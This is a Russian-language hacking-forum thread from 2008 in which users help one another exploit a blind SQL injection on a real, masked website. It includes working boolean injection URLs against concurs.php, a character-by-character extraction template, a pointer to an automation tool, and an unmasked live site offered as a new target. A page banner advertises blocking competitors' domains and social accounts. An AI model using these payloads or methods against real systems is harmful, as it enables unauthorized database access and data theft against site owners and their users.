FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Привязать к IP
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Уязвимости
помогите составить запрос !
Поиск по форуму
Расширенный поиск
Опции темы
Поиск в этой теме
Опции просмотра
помогите составить запрос !
#
1
19.06.2008, 19:50
stigmatus
Новичок
Регистрация: 26.04.2008
Сообщений: 23
С нами:
9495596
Репутация:
0
помогите составить запрос !
есть бажнии саит ! слепая sql injection!
пример :
Цитата:
http://********/concurs.php?id=4+AND+substring(version(),1,1)=5
резулитат : TRUE
а если :
Цитата:
http://*******/concurs.php?id=4+AND+ascii(lower(substring(version (),1,1)))=5
резулитат : FALSE
почему ????
читал статию http://injection.rulezz.ru/mysql_char_brute.html но чёта не как там описано ! help!
𝕏 Twitter
Reddit
Telegram
Копировать ссылку
stigmatus
Посмотреть профиль
Репутация
Отправить личное сообщение для stigmatus
Найти все сообщения от stigmatus
Добавить в друзья
#
2
19.06.2008, 19:58
spider-intruder
Постоянный
Регистрация: 10.12.2005
Сообщений: 939
С нами:
10746345
Репутация:
929
потому что код 5ки во втором запросе должен быть 53
http://*******/concurs.php?id=4+AND+ascii(lower(substring(version (),1,1)))=53
Ты приводиш первый символ значения переменной version() к типу ASCII т.е. к ее коду а он равен 53
Последний раз редактировалось spider-intruder; 19.06.2008 в
20:02
..
spider-intruder
Посмотреть профиль
Репутация
Отправить личное сообщение для spider-intruder
Найти все сообщения от spider-intruder
Добавить в друзья
#
3
19.06.2008, 20:04
stigmatus
Новичок
Регистрация: 26.04.2008
Сообщений: 23
С нами:
9495596
Репутация:
0
посиба ! подскажи как составить запрос типа : SELECT table_name from information_schema.tables
stigmatus
Посмотреть профиль
Репутация
Отправить личное сообщение для stigmatus
Найти все сообщения от stigmatus
Добавить в друзья
#
4
19.06.2008, 20:05
stigmatus
Новичок
Регистрация: 26.04.2008
Сообщений: 23
С нами:
9495596
Репутация:
0
на том же примере ???
stigmatus
Посмотреть профиль
Репутация
Отправить личное сообщение для stigmatus
Найти все сообщения от stigmatus
Добавить в друзья
#
5
19.06.2008, 20:08
spider-intruder
Постоянный
Регистрация: 10.12.2005
Сообщений: 939
С нами:
10746345
Репутация:
929
http://*******/concurs.php?id=4+AND+ascii(lower(substring("ЗАП РОС",1,1)))="ПЕРЕБИРАТЬ каждую букву методом схождения"
гдето есть софт для автоматизации процесса даже по слепой инъекции - ищите.
мне некогда )
spider-intruder
Посмотреть профиль
Репутация
Отправить личное сообщение для spider-intruder
Найти все сообщения от spider-intruder
Добавить в друзья
#
6
19.06.2008, 23:47
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами:
10485026
Репутация:
1879
Bsqlbf2
_https://forum.antichat.ru/threadnav20879-1-10.html
Последний раз редактировалось Ch3ck; 19.06.2008 в
23:50
..
Ch3ck
Посмотреть профиль
Репутация
Отправить личное сообщение для Ch3ck
Найти все сообщения от Ch3ck
Добавить в друзья
#
7
21.06.2008, 00:36
XJIOP
Познающий
Регистрация: 23.03.2005
Сообщений: 40
С нами:
11122570
Репутация:
13
народ что можно сдеалть с ошибкой в LIMIT? вот пример где ошибка http://mybits.ws:80/browse.php?page=0.01
XJIOP
Посмотреть профиль
Репутация
Отправить личное сообщение для XJIOP
Найти все сообщения от XJIOP
Добавить в друзья
«
Предыдущая тема
|
Следующая тема
»
Похожие темы
Тема
Автор
Раздел
Ответов
Последнее сообщение
Помогите составить регулярное выражение.
x88x
PHP
7
12.06.2008
18:27
Нужно составить правильный запрос, для веб-формы (https)
geograph
Разное - Покупка, продажа, обмен
0
31.12.2007
13:09
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ЛИЧНЫЕ ФОРУМЫ
Арбитраж трафика
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.